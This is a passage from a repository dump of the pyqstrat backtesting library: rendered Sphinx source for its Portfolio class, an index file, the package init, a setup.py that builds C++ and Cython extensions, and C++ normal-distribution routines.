class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Run indicators, signals and rules.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: A list of strategy names. By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> start_date: Run rules starting from this date. </span>\n<span class=\"sd\"> Sometimes we have a few strategies in a portfolio that need different lead times before they are ready to trade</span>\n<span class=\"sd\"> so you can set this so they are all ready by this date. Default None</span>\n<span class=\"sd\"> end_date: Don&#39;t run rules after this date. Default None</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_signals</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_rules</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.df_returns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.df_returns\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_returns</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Return dataframe containing equity and returns with a date index. Equity and returns are combined from all strategies passed in.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency for rows. 
Default &#39;D&#39; for daily so we will have one row per day</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">equity_list</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span>\n <span class=\"n\">equity</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"o\">=</span><span class=\"n\">sampling_frequency</span><span class=\"p\">)[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]]</span>\n <span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">columns</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">]</span>\n <span class=\"n\">equity</span> <span class=\"o\">=</span> <span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">equity_list</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">equity</span><span class=\"p\">)</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">(</span><span class=\"n\">equity_list</span><span class=\"p\">,</span> <span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;ret&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span 
class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">pct_change</span><span class=\"p\">()</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.evaluate_returns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.evaluate_returns\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">evaluate_returns</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">plot</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">True</span><span class=\"p\">,</span> \n <span class=\"n\">float_precision</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">4</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a dictionary of common return metrics.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency. Default &#39;D&#39; for daily so we downsample to daily returns before computing metrics</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> plot: If set to True, display plots of equity, drawdowns and returns. Default False</span>\n<span class=\"sd\"> float_precision: Number of significant figures to show in returns. 
Default 4</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">returns</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">)</span>\n <span class=\"n\">ev</span> <span class=\"o\">=</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">(</span><span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n <span class=\"n\">display_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">(),</span> <span class=\"n\">float_precision</span><span class=\"o\">=</span><span class=\"n\">float_precision</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">plot</span><span class=\"p\">:</span> <span class=\"n\">plot_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">())</span>\n <span class=\"k\">return</span> <span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.plot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.plot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">plot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Display plots of equity, drawdowns and returns</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency. Default &#39;D&#39; for daily so we downsample to daily returns before computing metrics</span>\n<span class=\"sd\"> strategy_names: A list of strategy names. 
By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">returns</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">)</span>\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ev</span> <span class=\"o\">=</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n <span class=\"n\">plot_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">())</span></div>\n \n <span class=\"k\">def</span> <span class=\"fm\">__repr__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">str</span><span class=\"p\">:</span>\n <span class=\"k\">return</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">()</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span></div>\n \n\n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;__main__&quot;</span><span class=\"p\">:</span>\n <span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 
id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n <form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.559440553188324, "alphanum_fraction": 0.5629370808601379, "avg_line_length": 15.823529243469238, "blob_id": "948502a960c752843d361c57f2d9a8b7c735fdae", "content_id": "50ad8ccbb33f3bc37c47814814526e6f22517201", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 286, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/docs/_sources/index.rst.txt", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "API documentation for pyqstrat\n====================================\n\nPlease read README.rst in the main directory to get started\n\n.. toctree::\n :maxdepth: 2\n :caption: Contents:\n\n modules\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.7966417670249939, "alphanum_fraction": 0.7985074520111084, "avg_line_length": 32.4375, "blob_id": "55e3e5e87db4f9a12e139b9c145486e9f6a97c7e", "content_id": "b26fb02585d319abe3eac5e57436bceb363e7df2", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "permissive", "max_line_length": 53, "num_lines": 16, "path": "/pyqstrat/__init__.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "# flake8: noqa\n# include functions for easy reference from pq prefix\nfrom pyqstrat.pq_utils import *\nfrom pyqstrat.pq_types import *\nfrom pyqstrat.pq_io import *\nfrom pyqstrat.holiday_calendars import *\nfrom pyqstrat.markets import *\nfrom pyqstrat.account import * \nfrom pyqstrat.strategy import *\nfrom pyqstrat.portfolio import *\nfrom pyqstrat.optimize import *\nfrom pyqstrat.plot import *\nfrom pyqstrat.interactive_plot import *\nfrom pyqstrat.evaluator import *\nfrom pyqstrat.pyqstrat_cpp import *\nfrom pyqstrat.pyqstrat_io import *\n\n" }, { "alpha_fraction": 0.5424058437347412, "alphanum_fraction": 0.5501822829246521, "avg_line_length": 41.86458206176758, "blob_id": "2cd2fa9af4d2e44fc98c9db927cbc4af23edb241", "content_id": "4c41c7c043ab4db61e968658fa1525f6aa83dcec", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 126, "num_lines": 96, "path": "/setup.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "import setuptools\nfrom Cython.Build import cythonize\nfrom distutils.core import setup, Extension\nimport numpy as np\nimport pybind11\nimport glob\nimport os\nimport sys\n\n\nif __name__ == '__main__':\n _conda_prefix = os.getenv('CONDA_PREFIX')\n _conda_prefix_1 = 
os.getenv('CONDA_PREFIX_1')\n if _conda_prefix is None and _conda_prefix_1 is None:\n raise RuntimeError(\"CONDA_PREFIX and CONDA_PREFIX_1 not found in env variables\")\n\n _windows = (sys.platform == \"win32\")\n\n conda_prefix = _conda_prefix if _conda_prefix else _conda_prefix_1\n pybind_11_include = [pybind11.get_include()]\n np_include = [np.get_include()]\n\n if sys.platform in [\"win32\", \"cygwin\"]:\n include_dirs = [f'{conda_prefix}/include',\n f'{conda_prefix}/Library/include']\n \n library_dirs = [f'{conda_prefix}/lib',\n f'{conda_prefix}/Library/lib',\n f'{conda_prefix}/bin',\n f'{conda_prefix}/Library/bin']\n else:\n include_dirs = [f'{conda_prefix}/lib'] \n library_dirs = [f'{conda_prefix}/lib']\n\n\n extra_compile_args=[] if _windows else ['-std=c++11', '-Ofast']\n cython_extra_compile_args=[] if _windows else ['-Wno-parentheses-equality', '-Wno-unreachable-code-fallthrough', '-Ofast']\n \n cpp_dir = 'pyqstrat/cpp'\n\n io_module = Extension('pyqstrat.pyqstrat_io',\n sources = [f'{cpp_dir}/io/{file}' for file in ['read_file.cpp', 'csv_reader.cpp']],\n include_dirs=include_dirs + np_include,\n library_dirs=library_dirs,\n libraries=['zip'],\n extra_compile_args=extra_compile_args)\n\n opt_cpp_files = glob.glob(f'{cpp_dir}/options/*.cpp') + glob.glob(f'{cpp_dir}/lets_be_rational/*.cpp')\n options_module = Extension('pyqstrat.pyqstrat_cpp',\n sources = opt_cpp_files,\n include_dirs=include_dirs + pybind_11_include,\n library_dirs=library_dirs,\n extra_compile_args=extra_compile_args)\n\n _compute_pnl_module = Extension('pyqstrat.compute_pnl',\n ['pyqstrat/compute_pnl.pyx'],\n include_dirs=np_include,\n extra_compile_args=cython_extra_compile_args,\n define_macros=[('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION')])\n compute_pnl_module = cythonize([_compute_pnl_module], compiler_directives={'language_level' : \"3\"})[0]\n \n with open('version.txt', 'r') as f:\n version = f.read().strip()\n\n with open('requirements.txt', 'r') as f:\n requirements = f.read().splitlines()\n\n with open('README.rst', 'r') as f:\n long_description=f.read()\n \n setup(name='pyqstrat',\n version=version,\n ext_modules = [io_module, options_module, compute_pnl_module],\n author_email='[email protected]',\n url='http://github.com/abbass2/pyqstrat/',\n license='BSD',\n python_requires='>=3.10',\n install_requires=requirements,\n description='fast / extensible library for backtesting quantitative strategies',\n long_description=long_description,\n packages=['pyqstrat'],\n include_package_data=True,\n platforms='any',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Natural Language :: English',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Office/Business :: Financial :: Investment',\n 'Programming Language :: Python :: 3.10',\n 'Programming Language :: Python :: 3 :: Only',\n ],\n zip_safe = False)\n" }, { "alpha_fraction": 0.4231995940208435, "alphanum_fraction": 0.624139666557312, "avg_line_length": 39.79452133178711, "blob_id": "069f111a68ccca4541d932038b50282d43aa62f7", "content_id": "590a92e9e4aafbfd58e7b2c6b0cadb8df4b373e8", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5962, "license_type": "permissive", "max_line_length": 120, "num_lines": 146, "path": 
"/pyqstrat/cpp/lets_be_rational/normaldistribution.cpp", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "//\n// normaldistribution.cpp\n//\n\n#if defined(_MSC_VER)\n# define NOMINMAX // to suppress MSVC's definitions of min() and max()\n// These four pragmas are the equivalent to /fp:fast.\n# pragma float_control( except, off )\n# pragma float_control( precise, off )\n# pragma fp_contract( on )\n# pragma fenv_access( off )\n#endif\n\n#include \"normaldistribution.h\"\n#include <float.h>\n\nnamespace {\n // The asymptotic expansion Φ(z) = φ(z)/|z|·[1-1/z^2+...], Abramowitz & Stegun (26.2.12), suffices for Φ(z) to have\n // relative accuracy of 1.64E-16 for z<=-10 with 17 terms inside the square brackets (not counting the leading 1).\n // This translates to a maximum of about 9 iterations below, which is competitive with a call to erfc() and never\n // less accurate when z<=-10. Note that, as mentioned in section 4 (and discussion of figures 2 and 3) of George\n // Marsaglia's article \"Evaluating the Normal Distribution\" (available at http://www.jstatsoft.org/v11/a05/paper),\n // for values of x approaching -8 and below, the error of any cumulative normal function is actually dominated by\n // the hardware (or compiler implementation) accuracy of exp(-x²/2) which is not reliably more than 14 digits when\n // x becomes large. Still, we should switch to the asymptotic only when it is beneficial to do so.\n const double norm_cdf_asymptotic_expansion_first_threshold = -10.0;\n const double norm_cdf_asymptotic_expansion_second_threshold = -1/sqrt(DBL_EPSILON);\n}\n\ndouble norm_cdf(double z){\n if (z <= norm_cdf_asymptotic_expansion_first_threshold) {\n // Asymptotic expansion for very negative z following (26.2.12) on page 408\n // in M. Abramowitz and A. Stegun, Pocketbook of Mathematical Functions, ISBN 3-87144818-4.\n double sum = 1;\n if (z >= norm_cdf_asymptotic_expansion_second_threshold) {\n double zsqr = z * z, i = 1, g = 1, x, y, a = DBL_MAX, lasta;\n do {\n lasta = a;\n x = (4 * i - 3) / zsqr;\n y = x * ((4 * i - 1) / zsqr);\n a = g * (x - y);\n sum -= a;\n g *= y;\n ++i;\n a = fabs(a);\n } while (lasta > a && a >= fabs(sum * DBL_EPSILON));\n }\n return -norm_pdf(z) * sum / z;\n }\n return 0.5*erfc_cody( -z*ONE_OVER_SQRT_TWO );\n}\n\ndouble inverse_norm_cdf(double u){\n //\n // ALGORITHM AS241 APPL. STATIST. (1988) VOL. 37, NO. 
3\n //\n // Produces the normal deviate Z corresponding to a given lower\n // tail area of u; Z is accurate to about 1 part in 10**16.\n // see http://lib.stat.cmu.edu/apstat/241\n //\n const double split1 = 0.425;\n const double split2 = 5.0;\n const double const1 = 0.180625;\n const double const2 = 1.6;\n\n // Coefficients for P close to 0.5\n const double A0 = 3.3871328727963666080E0;\n const double A1 = 1.3314166789178437745E+2;\n const double A2 = 1.9715909503065514427E+3;\n const double A3 = 1.3731693765509461125E+4;\n const double A4 = 4.5921953931549871457E+4;\n const double A5 = 6.7265770927008700853E+4;\n const double A6 = 3.3430575583588128105E+4;\n const double A7 = 2.5090809287301226727E+3;\n const double B1 = 4.2313330701600911252E+1;\n const double B2 = 6.8718700749205790830E+2;\n const double B3 = 5.3941960214247511077E+3;\n const double B4 = 2.1213794301586595867E+4;\n const double B5 = 3.9307895800092710610E+4;\n const double B6 = 2.8729085735721942674E+4;\n const double B7 = 5.2264952788528545610E+3;\n // Coefficients for P not close to 0, 0.5 or 1.\n const double C0 = 1.42343711074968357734E0;\n const double C1 = 4.63033784615654529590E0;\n const double C2 = 5.76949722146069140550E0;\n const double C3 = 3.64784832476320460504E0;\n const double C4 = 1.27045825245236838258E0;\n const double C5 = 2.41780725177450611770E-1;\n const double C6 = 2.27238449892691845833E-2;\n const double C7 = 7.74545014278341407640E-4;\n const double D1 = 2.05319162663775882187E0;\n const double D2 = 1.67638483018380384940E0;\n const double D3 = 6.89767334985100004550E-1;\n const double D4 = 1.48103976427480074590E-1;\n const double D5 = 1.51986665636164571966E-2;\n const double D6 = 5.47593808499534494600E-4;\n const double D7 = 1.05075007164441684324E-9;\n // Coefficients for P very close to 0 or 1\n const double E0 = 6.65790464350110377720E0;\n const double E1 = 5.46378491116411436990E0;\n const double E2 = 1.78482653991729133580E0;\n const double E3 = 2.96560571828504891230E-1;\n const double E4 = 2.65321895265761230930E-2;\n const double E5 = 1.24266094738807843860E-3;\n const double E6 = 2.71155556874348757815E-5;\n const double E7 = 2.01033439929228813265E-7;\n const double F1 = 5.99832206555887937690E-1;\n const double F2 = 1.36929880922735805310E-1;\n const double F3 = 1.48753612908506148525E-2;\n const double F4 = 7.86869131145613259100E-4;\n const double F5 = 1.84631831751005468180E-5;\n const double F6 = 1.42151175831644588870E-7;\n const double F7 = 2.04426310338993978564E-15;\n\n if (u<=0)\n return log(u);\n if (u>=1)\n return log(1-u);\n\n const double q = u-0.5;\n if (fabs(q) <= split1)\n {\n const double r = const1 - q*q;\n return q * (((((((A7 * r + A6) * r + A5) * r + A4) * r + A3) * r + A2) * r + A1) * r + A0) /\n (((((((B7 * r + B6) * r + B5) * r + B4) * r + B3) * r + B2) * r + B1) * r + 1.0);\n }\n else\n {\n double r = q<0.0 ? u : 1.0-u;\n r = sqrt(-log(r));\n double ret;\n if (r < split2)\n {\n r = r - const2;\n ret = (((((((C7 * r + C6) * r + C5) * r + C4) * r + C3) * r + C2) * r + C1) * r + C0) /\n (((((((D7 * r + D6) * r + D5) * r + D4) * r + D3) * r + D2) * r + D1) * r + 1.0);\n }\n else\n {\n r = r - split2;\n ret = (((((((E7 * r + E6) * r + E5) * r + E4) * r + E3) * r + E2) * r + E1) * r + E0) /\n (((((((F7 * r + F6) * r + F5) * r + F4) * r + F3) * r + F2) * r + F1) * r + 1.0);\n }\n return q<0.0 ? -ret : ret;\n }\n}\n\n" } ]
29
ysecmg/Fluent-Python
https://github.com/ysecmg/Fluent-Python
5dfbc312189c211007740f69a5440343560323d9
ffff7b1660ed6762af122900e968664748536312
00ce96427c69391cd9c2dc8d86d86c639ff556a5
refs/heads/master
2020-07-23T20:10:59.647366
2019-09-16T11:37:27
2019-09-16T11:37:27
207,693,937
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5155993700027466, "alphanum_fraction": 0.6174055933952332, "avg_line_length": 27, "blob_id": "0d4bae125f4d6556bb55f08a9243c52a9aaaaa18", "content_id": "31a79cab41e9eaab960efbe0289d98de7d19c118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 609, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/2_tuple.py", "repo_name": "ysecmg/Fluent-Python", "src_encoding": "UTF-8", "text": "colors = ['black', 'white']\r\nsizes = ['S', 'M', 'L']\r\ntshirts = [(color, size) for color in colors for size in sizes]\r\n\r\n'''\r\nfor tshirt in ('%s %s' % (c,s) for c in colors for s in sizes):\r\n print(tshirt)\r\n'''\r\n\r\n# lax_coordinates = (33.9425, -118.408056)\r\n# latitude, longitude = lax_coordinates\r\n\r\n# quotient, remainder = divmod(20,8)\r\n\r\nfrom collections import namedtuple\r\nCity = namedtuple('City', 'name country population coordinates')\r\nmetro_areas = [\r\n ('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),\r\n ('Delhi NCR', 'IN', 21.935, (28.613889,77.208889)),\r\n]\r\ntokyo = City(*metro_areas[0])\r\n" } ]
1
hlshao/scientific-cms
https://github.com/hlshao/scientific-cms
f762151bb7a7331f1b5cc70d203a41c3211ab234
d04efe912ef882574a0c0d5be68ee92f56a11cf5
f1b895e3625c314e6bb113c59584ec83bee95d91
refs/heads/master
2020-12-02T23:57:02.476922
2017-06-30T04:45:15
2017-06-30T04:45:15
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6121672987937927, "alphanum_fraction": 0.6121672987937927, "avg_line_length": 19.230770111083984, "blob_id": "21cd8945759e0217ea428a0cc9a38943513894d1", "content_id": "e03370e8b17081b361b47ffac8b126513dae438a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 32, "num_lines": 13, "path": "/trivial_tools.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import threading\n\ndef safely(func):\n try: return func()\n except: return None\n\ndef get_locker():\n lock = threading.Lock()\n def locker(func, lock=lock):\n lock.acquire()\n try: return func()\n finally: lock.release()\n return locker\n" }, { "alpha_fraction": 0.5606446266174316, "alphanum_fraction": 0.5685608983039856, "avg_line_length": 33.67647171020508, "blob_id": "a06bf3e9460d6028daf55314a9467e6b576ff6c0", "content_id": "5c89a1494afa6289ca7c39e98c4bac66733dc31e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3537, "license_type": "no_license", "max_line_length": 111, "num_lines": 102, "path": "/server.py", "repo_name": "hlshao/scientific-cms", "src_encoding": "UTF-8", "text": "import os\nimport uuid\nimport json\nimport time\nimport 